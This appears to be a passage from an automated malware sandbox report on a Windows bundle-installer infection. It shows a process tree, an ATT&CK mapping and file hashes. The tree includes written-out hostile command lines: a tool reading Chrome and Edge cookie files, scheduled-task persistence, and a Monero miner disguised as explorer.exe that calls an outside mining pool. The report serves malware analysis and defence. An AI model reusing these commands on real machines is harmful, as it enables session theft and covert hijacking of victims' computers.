                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628419426 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                  10⤵
                                                                                                                                                    PID:7936
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6892
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5104
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-ECMOB.tmp\GameBoxWin32.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-ECMOB.tmp\GameBoxWin32.tmp" /SL5="$4034E,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:7140
                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5144
                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6916
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                              10⤵
                                                                                                                                                                PID:6656
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:6940
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:3960
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:7372
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:8004
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:1456
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3736214.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3736214.exe"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:3940
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6161528.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6161528.exe"
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:6844
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7025364.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7025364.exe"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:7088
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8141716.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8141716.exe"
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:6404
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c zaiqa_8.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:3836
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_8.exe
                                                                                                                                                                        zaiqa_8.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2184
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c zaiqa_9.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:3832
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4560
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2no.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\2no.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4696
                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4696 -s 1512
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4740
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4776
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5088
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\askinstall54.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4852
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4884
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4896
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4960
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5892
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:4724
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5912
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:7496
                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:7660
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1972
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\NGlorySetp.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:2184
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4143651.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4143651.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2904
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3699151.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3699151.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4220
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4562988.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4562988.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5840
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5679340.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5679340.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3160
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4972
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 804
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:3860
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 792
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5692
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 876
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:4988
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 948
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5504
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 960
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5520
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1088
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5836
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup329.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup329.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2444
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\mysetnew.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\mysetnew.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                              PID:1208
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:3912
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:6168
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:6912
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3912 -s 1496
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:6228
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:5068
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_9.exe
                                                                                                                                                                                                  zaiqa_9.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:3856
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4420
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4656
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2764
                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 3856 -s 1528
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:6132
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          PID:4780
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4392
                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5312
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5648
                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5648 -s 456
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:6036
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:5272
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4156
                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                  PID:5064
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4952
                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2624
                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 14CD462DC3CA375227B9C8DF207B7F70 C
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4232
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 87ACCA46C2C08D98C9F7DB90AA2D8C5B C
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4800
                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 8F3A0E942D74A14E3C256B41EADE5DDB
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5300
                                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:4796
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:6364
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5ED5.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5ED5.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:7888

                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                              2
                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                              2
                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                              3
                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                b1984c142d178dd4a7d8bc5472e766a1

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                e15c3d475cfb3ace05f288ff4931d606d979677a

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                35e33ce28b54798ff9a160924bf9eb3717e0fe4fb1c1c150d6875715e6bc52f5

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                936150262ac34949f68df02e809a8733ace1aa0d924f967cf226c0b23f45c80ee277c75d9b1d41f5131fcbe09047a6d3b7f84cdf86d6018ea5731465e605d0e8

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                204d30f4d858cc0d53ea1b0fcbec71dd

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                cf48aa8c54ee5b548d8bf0715717f1e9a40633f0

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                9e4a829e536215c55836b3d7cfb8c35c697b3f91199f0784055b2c1172a556e4

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                8d2480827c0033884981d26b514c6f9fa170425714ad4431bd44f8c4e0348e08955f8e6edfd727cde9087c1aaf22eb4e74c08d853a8df19d3f474eec2d040cfc

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                116158c962507f5d36d195bbe2e6112e

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                bddeec108ad6e2520bd38af0e3bb438be1b8d9ad

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                46638356ea47b10adbb03378d48edd906692c64ba5bdfe2c16e33989ab8698a4

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                1c243032b6e69f8e3eb5f20fb6dc07ee62a4f1ca63c0b7ea570c98cea1f3bda513515c456e2cbd2dec2e8e2923c8bad7bfd678ff14ce13985f901e6272d88d0a

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                037e2f82602e54e6db0de64ac37c88b6

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                99b7bb7759d12bb2e5607c1e95f6d8e058f56973

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                409c3ba273491f7c0f6883fffacda9397efbe493608564d962e0db8bb5059bae

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                e82362ff1e0ce5538eb27fbabbd674fe1a6cf6a0474bc6da3f8cb693272c0d6f963d5370473e725ed0dd85cb52a3f404b75d4a16ac8b401cfe8ec7b3d802a24e

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                037e2f82602e54e6db0de64ac37c88b6

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                99b7bb7759d12bb2e5607c1e95f6d8e058f56973

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                409c3ba273491f7c0f6883fffacda9397efbe493608564d962e0db8bb5059bae

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                e82362ff1e0ce5538eb27fbabbd674fe1a6cf6a0474bc6da3f8cb693272c0d6f963d5370473e725ed0dd85cb52a3f404b75d4a16ac8b401cfe8ec7b3d802a24e

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2no.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                a184fb9439436d65ee5879b3ab511828

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                db6e07aafefbc89a0b3a51c0b4768f5a33d74f34

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                4e5a49a02dd6c3d9c08f782ebab2fd56c1296ab20149a36f340fd24404140a26

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                8683de03dc56c26656129b35f9dbbfbd8f4a3f9bac7900273171bcb1267828d28f0f1c4d31a99859f8ae85d38cc9741c49ad3e5396dc1ef4cc863ddaa6d6d468

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2no.exe
